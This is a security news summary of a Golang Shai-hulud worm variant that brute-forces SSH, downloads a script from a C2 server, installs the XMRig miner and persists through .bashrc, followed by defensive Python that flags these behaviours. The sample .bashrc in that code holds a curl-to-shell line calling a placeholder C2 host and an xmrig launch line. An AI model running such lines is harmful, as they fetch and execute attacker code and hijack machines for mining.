A new variant of the Shai-hulud worm has been identified by security researchers at Check Point. This resurfaced malware, named after a creature from the ‘Dune’ science fiction series, is designed to install cryptocurrency mining software on compromised systems.
Technical Evolution: From Perl to Golang
Unlike its Perl-based predecessor, this version of Shai-hulud is written in the Go programming language (Golang). The use of Golang provides the worm with cross-platform capabilities, although the observed attacks specifically target Linux systems. Researchers identified the name ‘Shai-hulud’ within the malware’s code, which was compiled without symbols to make reverse-engineering and analysis more difficult.
Attack Vector and Payload Delivery
The worm’s primary method of propagation is through brute-force attacks against SSH services. It utilizes a hardcoded list of common usernames and passwords to gain unauthorized access to Linux servers. Once a system is breached, the worm connects to a command-and-control (C2) server to download and execute a malicious script. This script is responsible for deploying the final payload: the XMRig cryptocurrency miner, which is used to mine Monero. To ensure its continued presence on the infected machine, the malware establishes persistence by modifying the .bashrc file, causing it to execute each time a user logs in.
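As an added illustration for defenders (not code from the article or from Check Point's research), the following Python checks for the two behaviours described above: a burst of failed SSH password attempts from one address that ends in a successful login, and .bashrc lines that match the download-and-execute or miner pattern. All log lines, addresses, paths and the C2 placeholder are constructed for this example.

```python
import re
from collections import Counter

# Constructed sample sshd log lines (not from the article or any real host).
SAMPLE_AUTH_LOG = """\
Jan 10 03:14:01 host sshd[2201]: Failed password for root from 198.51.100.23 port 51112 ssh2
Jan 10 03:14:02 host sshd[2201]: Failed password for invalid user admin from 198.51.100.23 port 51113 ssh2
Jan 10 03:14:03 host sshd[2201]: Failed password for invalid user test from 198.51.100.23 port 51114 ssh2
Jan 10 03:14:04 host sshd[2201]: Failed password for invalid user ubuntu from 198.51.100.23 port 51115 ssh2
Jan 10 03:14:05 host sshd[2201]: Failed password for root from 198.51.100.23 port 51116 ssh2
Jan 10 03:14:09 host sshd[2201]: Accepted password for root from 198.51.100.23 port 51117 ssh2
Jan 10 03:20:00 host sshd[2300]: Failed password for alice from 203.0.113.7 port 40000 ssh2
Jan 10 03:20:30 host sshd[2300]: Accepted publickey for alice from 203.0.113.7 port 40001 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(r"Accepted \w+ for (\S+) from (\d+\.\d+\.\d+\.\d+)")

def brute_force_then_success(log_text, threshold=5):
    """Return source IPs with >= threshold failed password logins followed by a success."""
    failures = Counter()
    flagged = set()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(2)] >= threshold:
            flagged.add(m.group(2))
    return sorted(flagged)

# .bashrc fragment constructed for the example; the C2 host and paths are placeholders.
SAMPLE_BASHRC = """\
# ~/.bashrc
alias ll='ls -alF'
curl -s http://EXAMPLE-C2-PLACEHOLDER/x.sh | sh
nohup /tmp/.x/xmrig -o pool.example:3333 >/dev/null 2>&1 &
"""

SUSPICIOUS_RE = re.compile(
    r"xmrig|"                                     # miner named in the report
    r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b|"  # download piped straight into a shell
    r"/tmp/\.\w+"                                 # hidden binary under /tmp
)

def suspicious_bashrc_lines(text):
    """Return (line_no, line) pairs in a .bashrc that match the persistence indicators above."""
    return [(n, l) for n, l in enumerate(text.splitlines(), 1) if SUSPICIOUS_RE.search(l)]
```

The threshold and the indicator regex are starting points to tune against your own baseline, not a complete signature for this worm.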
Source: https://www.darkreading.com/application-security/infamous-shai-hulud-worm-resurfaces-from-depths